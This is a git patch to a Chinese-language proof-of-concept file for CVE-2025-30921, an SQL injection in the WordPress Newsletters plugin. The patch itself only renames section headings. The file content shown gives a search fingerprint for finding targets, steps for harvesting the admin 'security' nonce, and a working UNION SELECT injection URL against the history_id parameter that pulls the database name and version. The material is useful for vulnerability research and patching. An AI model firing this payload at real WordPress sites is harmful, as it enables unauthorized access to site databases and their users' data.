From ab967c7b6b34a4250bd68e59f8f0afcd8d2f178d Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 7 Apr 2025 11:32:41 +0800
Subject: [PATCH] =?UTF-8?q?Update=20WordPress=20Newsletters=20Plugin?=
 =?UTF-8?q?=E5=AD=98=E5=9C=A8SQL=E6=BC=8F=E6=B4=9E(CVE-2025-30921).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md b/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
index 09b3b89..340ba0c 100644
--- a/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md	
+++ b/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md	
@@ -8,13 +8,14 @@ WordPress在Newsletters插件版本4.9.9.7或更低版本的插件仪表板中
 body="/wp-content/plugins/web-directory-free"
 ```
 
-## poc-(需要Administrator权限)
+## 前提条件和Administrator权限
 使用浏览器开发者工具，action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如，如果搜索结果如下所示，请记下22b1ac0de6
 ```
 jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
 ```
 ![image](https://github.com/user-attachments/assets/c82f3e9a-fd70-405f-b6d0-d9bd77622f76)
 
+## poc
 ```javascript
 http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
 ```